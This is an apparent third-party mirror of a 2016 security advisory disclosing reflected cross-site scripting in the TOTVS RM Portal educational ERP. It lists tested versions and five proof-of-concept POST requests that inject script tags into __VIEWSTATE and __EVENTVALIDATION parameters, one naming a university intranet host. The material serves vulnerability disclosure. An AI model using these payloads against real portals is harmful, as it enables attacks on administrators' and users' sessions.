Vulmon
TOTVS RM PORTAL (Educational) - Multiple Cross Site Scripting Vulnerabilities
Product web page: www.totvs.com.br
Author: vesp3r
Email: vesp3r7c3@gmail.com
Published: 13/02/2016
[Vendor Product Description]
TOTVS (pronounced Totus) is a Brazilian software company, with headquarters in Sao Paulo. TOTVS was initially formed
from the merger of Microsiga and Logocenter companies. It is the largest software company in Latin America.
TOTVS is the leader in the Brazilian ERP market and according to the FGV, besides Brazil, with offices in
Argentina, Mexico and the United States.
[Advisory Timeline]
1- 22/Dec/2015 (No vendor response)
2- 05/Feb/2016 (No vendor response)
Tested on:
11.40.80.x
11.52.50.x
11.52.63.x
11.52.64.x
11.82.41.1
11.82.37.0
11.82.41.112
11.82.42.1
12.1.6.108
12.1.6.117
12.1.7.100
12.1.7.110
12.1.7.120
12.1.8.0
12.1.8.1
[Vulnerability Details]
Attacker could take advantage of reflective XSS by using unprotected __VIEWSTATE and __EVENTVALIDATION parameters,
passed to various scripts. A remote attacker can trick a logged-in administrator to open a specially crafted link
and execute arbitrary javascript code in browser in context of the vulnerable website.
1)
Reflected Cross-site Scripting - Login.aspx
Parameter: __VIEWSTATE
POST /corpore.net/Login.aspx HTTP/1.1
[Snip...]
Content-Length:599
Expect:100-continue
Connection:Keep-Alive
__VIEWSTATEGENERATOR=67BA4204&__EVENTARGUMENT=&txtPass=&__VIEWSTATE=%2fwEPDwULLTE4NzE2MDUyNDEPZBYCAgUPZBYCAgMPZBYKAgQPFgIeDUVudGVyRGlzYWJsZWQFBUZhbHNlZAIIDxYCHwAFBUZhbHNlZAIMDxBkDxYBZhYBEAUJQ29ycG9yZVJNBQlDb3Jwb3JlUk1nFgFmZAIQDw9kFgIeD0Rpc2FibGVPblN1Ym1pdAUFZmFsc2VkAhIPD2QWAh4Hb25jbGljawURRm9yZ290UGFzc3dvcmQoKTtkZOnQ03VTJ%2f9xMgjAXrV8uog9rRH%2flHTcm8QGAjB9nwz8a0d92<script>alert(1)<%2fscript>cd412&ddlAlias=CorporeRM&txtUser=&btnLogin=btnLogin%3dAcessar&__EVENTTARGET=&__EVENTVALIDATION=%2fwEdAAVhABOpj5tofEWFrJaBMLLmDFTzKcXJqLg%2bOeJ6QAEa2kPTPkdPWl%2b8YN2NtDCtxie46B0WtOk572tmQWZGjlgiop4oRunf14dz
2) Reflected Cross-site Scripting - EduPSCadastroCandidato.aspx
Parameter: __VIEWSTATE
POST /Corpore.Net/Source/EduPS-ProcessoSeletivo/Public/EduPSCadastroCandidato.aspx HTTP/1.1
[Snip...]
Content-Length:294
Expect:100-continue
Connection:Keep-Alive
__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=26e09<script>alert(1)<%2fscript>6675c&__VIEWSTATEGENERATOR=2A268E6E&__EVENTVALIDATION=%2FwEdAGthFF%2FXOtK6iDwfhX1K6Jqoyk0VTIKR5mmZ%2BtIHMzMSvhs0Jc5vMLgh%2BScncp5A4h37bPOfETC9GIxfmAuz0Irc0oWQaruiZXPsPoJusmqmY3neRyPHmUYXvOoYPCF%2BNI6bJS0pQ
3) Reflected Cross-site Scripting - calendar.aspx - _
Parameter: __VIEWSTATE
POST /Corpore.Net/SharedServices/LibPages/Calendar.aspx HTTP/1.1
[Snip..]
Content-Type:application/x-www-form-urlencoded
Content-Length:370
Expect:100-continue
__VIEWSTATEGENERATOR=CBEC090A&__EVENTARGUMENT=&__VIEWSTATE=%2fwEPDwUKMTY1OTMzMTQ5MmRk0Sm9YhG2VrmP7sr3Vdu25PXWEY00sTB9uOI0E2J%2bDto%3d8f844<script>alert(1)<%2fscript>f1c95&ddYear=1940&ddMonth=1&__LASTFOCUS=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEdANEBWDAi1sF9XTMpt%2bPoIvbLLrtqFwodORsBP5MdtMp97Worg0EVYGtniwWRlldVBtgv0s7aRHloaIopjAs%2b7nenbhd3yRDnFv26m%2by5T5c3Rd7F9O8yK3w
6) Reflected Cross-site Scripting - TstMain.aspx
Parameter: __VIEWSTATE
POST /Corpore.Net/Source/Tst-Avaliacao/RM.Tst.Provas/Public/TstMain.aspx HTTP/1.1
Referer:http://intra.ubm.br/Corpore.Net/Source/Tst-Avaliacao/RM.Tst.Provas/Public/TstMain.aspx
[Snip..]
Content-Length:589
Expect:100-continue
Connection:Keep-Alive
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=blFubtHIte6TnItfljNkVuCPdpxrn2d21QVLovI1Oj6c1BjTFGCeNA%2bNH1hljOzffBO%2bE1VjGIfJORklj03DwzHH9gnfklyMHTfrSc6jXT0lmgWQ%2fn09OLOLHFy22L%2f09cQ2cnhIJ8zjXTNBkJOTrizTSX8roB4A2%2f5F0nw%2bHMedUzRwjzgcvas%2bVdOqpdrMgp%2bqwioI9MguZtfxVD7ONhnPDwo%2bUgLB2QraeHh4Fd7DAFy2BsVsCl7an3DaKlx0pMIwi%2f2g%2f8y%2f5VXL1WbXYw%3d%3d63eb9<script>alert(1)<%2fscript>35554&__VIEWSTATEGENERATOR=D041C7D7&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=oIbBDabE%2FPH2SjDjDsk1A4dri3DAV4qax04lAj1I%2B3JimDK%2Bq%2Bl4qrek8MK8H861dVvJHSx56%2BNa5v49Ol5ulZsG3D1QPnf2XgNT1yp2LaTarGQOsUfw60t
5) Reflected Cross Site Scripting - RecoverPassConfirmation.aspx
__EVENTVALIDATION Parameter
POST /Corpore.Net/SharedServices/LibPages/RecoverPassConfirmation.aspx?UserCaption=5LK%5c9F%5c3D%5c023%5c5B&ConfirmationCaption=%5c7B%5cFAbP%5c06%5c11Q%5c7C&RecoverContainerClassName=ASP.login_aspx%2c+App_Web_jfz24ryx%2c+Version%3d0.0.0.0%2c+Culture%3dneutral%2c+PublicKeyToken%3dnull&RecoverInitializeMethodName=GetRecoverPassServer&ServiceAlias=CorporeRM HTTP/1.1
[Snip..]
Content-Type: application/x-www-form-urlencoded
Content-Length: 458
__EVENTTARGET=btConcluir&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE2NDcyMzE4MDYPZBYCAgMPZBYEAgQPDxYCHgRUZXh0BQhVc3XDoXJpb2RkAgoPDxYCHwAFBUVtYWlsZGRkb5MeS264FOK9nmP0a1CNQffkay3Ey3ZEBuou6pi65D8%3D&__VIEWSTATEGENERATOR=AF2B313E&__EVENTVALIDATION=%2fwEdAAQGOgL7oK09LZ8PS37yV0yhEtmPWx9iivvmRAEsPWDH1L%2bBuAd%2fYR2jHO%2bKtDPe6m0Cy01bBAlsk2p17oJudhiaquajs%2bXic334N3XfjA0JtMaIEGbBaz%2fyyDVIoKpthJc%3dd8504<script>alert(1)<%2fscript>a2460&TextBoxUser=a%40a.com&TextBoxConfirmation=a%40a.com
Thanks to: Ewerson Guimarães (Crash) and Rodrigo Favarini
<p>